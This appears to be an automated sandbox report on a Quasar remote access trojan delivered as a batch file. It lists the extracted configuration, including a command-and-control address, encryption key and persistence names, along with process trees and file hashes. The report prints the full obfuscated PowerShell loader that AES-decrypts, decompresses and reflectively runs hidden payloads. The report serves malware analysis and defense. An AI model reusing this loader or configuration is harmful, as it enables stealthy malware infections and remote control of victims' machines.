Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 05:16
Static task
static1
Behavioral task
behavioral1
Sample
Client-built.bat
Resource
win7-20241023-en
General
-
Target
Client-built.bat
-
Size
1.6MB
-
MD5
a7aa482ba1ee0ea8d147d628d5a65f05
-
SHA1
91e3a640c294a36697d9759a29072fdb4ab62346
-
SHA256
79173bee83878cae44d9fc21fa85590711a92edc2d43caafb1350eb2800e72d7
-
SHA512
a27dae71d85910609682cc324d4c4cf5c2e772f0a57209d2fbdc3e345538487d1262148b01b16df8cfb52c3c2a72ae04eb381f7dcf33d77c01d532d421e93a32
-
SSDEEP
24576:tkjkTu1rkvOjvCsDjTprQ50JDzRj2umzby88rBFjB9a/In5PJBmpR4JRej08SG84:t859kWf+gEJe8yBBl+pIVX4
Malware Config
Extracted
quasar
1.4.1
Office04
85.209.133.15:111
4427abb1-66d5-405b-a340-061f8386d8c1
-
encryption_key
A0083941CFC8C27C9F733BBA0ECD4E4B76BD61E8
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/3780-15-0x0000026B338F0000-0x0000026B33C14000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 3780 powershell.exe 15 3780 powershell.exe 17 3780 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3780 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3780 powershell.exe 3780 powershell.exe 3008 msedge.exe 3008 msedge.exe 4044 msedge.exe 4044 msedge.exe 3004 identity_helper.exe 3004 identity_helper.exe 5816 msedge.exe 5816 msedge.exe 5816 msedge.exe 5816 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3780 powershell.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4376 wrote to memory of 3780 4376 cmd.exe 83 PID 4376 wrote to memory of 3780 4376 cmd.exe 83 PID 4044 wrote to memory of 4244 4044 msedge.exe 94 PID 4044 wrote to memory of 4244 4044 msedge.exe 94 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 1748 4044 msedge.exe 95 PID 4044 wrote to memory of 3008 4044 msedge.exe 96 PID 4044 wrote to memory of 3008 4044 msedge.exe 96 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97 PID 4044 wrote to memory of 4108 4044 msedge.exe 97
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6NsuP0HTePf1oSATs8T+qB1p4ZrLbvAIaEmbH1pdsE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kxx6XOKog+oT5+kzMuvMwA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HWbzm=New-Object System.IO.MemoryStream(,$param_var); $PCqqJ=New-Object System.IO.MemoryStream; $ePDKE=New-Object System.IO.Compression.GZipStream($HWbzm, [IO.Compression.CompressionMode]::Decompress); $ePDKE.CopyTo($PCqqJ); $ePDKE.Dispose(); $HWbzm.Dispose(); $PCqqJ.Dispose(); $PCqqJ.ToArray();}function execute_function($param_var,$param2_var){ $GchUI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZfPjM=$GchUI.EntryPoint; $ZfPjM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$QJrfq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($aydBO in $QJrfq) { if ($aydBO.StartsWith(':: ')) { $CdaqF=$aydBO.Substring(3); break; }}$payloads_var=[string[]]$CdaqF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb8bbc46f8,0x7ffb8bbc4708,0x7ffb8bbc47182⤵PID:4244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:22⤵PID:1748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:82⤵PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:12⤵PID:3232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:12⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:1372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:12⤵PID:472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:12⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:12⤵PID:3584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:12⤵PID:4324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:5364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:12⤵PID:5372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:12⤵PID:5472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6016 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5816
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3584
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1328
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD536988ca14952e1848e81a959880ea217
SHA1a0482ef725657760502c2d1a5abe0bb37aebaadb
SHA256d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6
SHA512d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173
-
Filesize
152B
MD5fab8d8d865e33fe195732aa7dcb91c30
SHA12637e832f38acc70af3e511f5eba80fbd7461f2c
SHA2561b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea
SHA51239a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD5b6b32513c883785bd564830a61e09743
SHA1979cbd4d2f44d4b79ba9911df214fdef2e2a1b71
SHA25629d0d598950d0046dd0523a5626091029fbab11f4cbb24f7ca21f0706727c8b6
SHA5121af5f3b37d79eca3c1e9788c059fc74b8d7a62c7f1133d93041a8c08c61912702a9c7a34419338f1bab2a82c7f9594a065552a3d44cfc4e6808374ac6dcb3cb1
-
Filesize
1KB
MD503d5b7a9789cec7a10bce2393cdce68d
SHA14e8937f83c57a89daad580d375c62d5786206183
SHA256b78f4a22939ac04469440ce834c36f31f8c120cb7356fe4608a16ffa351b3070
SHA5124e3c5933ba981579b657a1134d212bf0dde832fa11700dadc164a9aa5c800eab153558af75549ada1d4bef5069310d606403bc576727c5b0aa0e8d57d8a60332
-
Filesize
6KB
MD530f2cc1b60d5a36413fcd0eabc9dfa97
SHA19830ff2cf5d30b75a5913e490f90ddebf6519761
SHA2564378bda31124f7d0011a6d25f764c1cca4a45a469a63a369778e2ec570f21e7f
SHA512d6e4b6fa6957d22cb743ee3ec372890f3e9c1034eb910c05fe8202c9bec0449730d007b6cb7d42df68880d33ec64f856df638cc41417ab77c8c83020cbab1829
-
Filesize
7KB
MD53b867683b2fcca87ed6e160e312b7c9c
SHA1d1a182db06af472a489ce59cf8ddc0f7459bc747
SHA256fa551d4722983bc30db4a00d93f281697e8e7cf2977efc8cc70ca2bda09ac311
SHA51227bef4fac5d6addfe639f4d1394d2efa6090fcc009f030d1227aef79d759367c58bb0db34d07dc0a276a88856a0fa4589822801e432e6ef6cfe400077cc595d3
-
Filesize
5KB
MD50eb5e4af5fd9e8329686f2ad667a970b
SHA1797dec80dbcd5d772bfad1a335751c11bd4b5d75
SHA256bd0b65c9de7b9b25a7a587ec3cb3261a0f5b495ffbbf8be1399f1f9ad2782118
SHA512319fb809d09c7207f37cddc8f007f6e69ac5034aa6e039d19cb724a4ea17414b439ac615b30390398f12208293d47b2f8041f156a22238a5fc404fc67a181336
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize96B
MD5aeb592879c98b20ccdb74c9f6eb996b4
SHA10fae1b2588239798aefe4b2cf1c1ff479b451831
SHA256a525ba8992f8cd30270c9f9302f8a1154f7c193dab6341c1b6a777816d617c4d
SHA512d58df22c65d5c0e566a5044712d2af967926f92188e77b610021121b2b69cc2de45fe79cc4c9fb3eac906ef8e7ae6178693ef990751a209c7d8e73683ed24126
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe588d28.TMP
Filesize48B
MD51ce7652565ba37533227ac332f510165
SHA1daaa9605023551a9cb6ec71a2ca84dcf568b0aab
SHA256bca9549ecb38f62ef29117ea4c482f6be85c87315b69355cfad710ce87a29443
SHA5121a5f3cabccf0719db6b59c5853f092cf9952aa8a4a052a90c6b31e84b6458df421e8d1f6bc79db73b6edf8b74e5ebd2d92d5c091e6f84ac2a61efdd9d4364855
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
MD56bb870fdabcf6c36ed8271c8ac206bb4
SHA185ce7e701c0ef6767afcdeb35da8da34d36814fd
SHA2563b93d0d904e51dc5ef0a26e0d527368595b06be86c894aba9bc8fd27d67195da
SHA512dde4edf09b043f738eab54abb36465953aeb9461f4de41aa7969347916d6ea6b1516faf801a9b604fae62263898fff3e8ec27ec75f217c7f427dade224346293
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82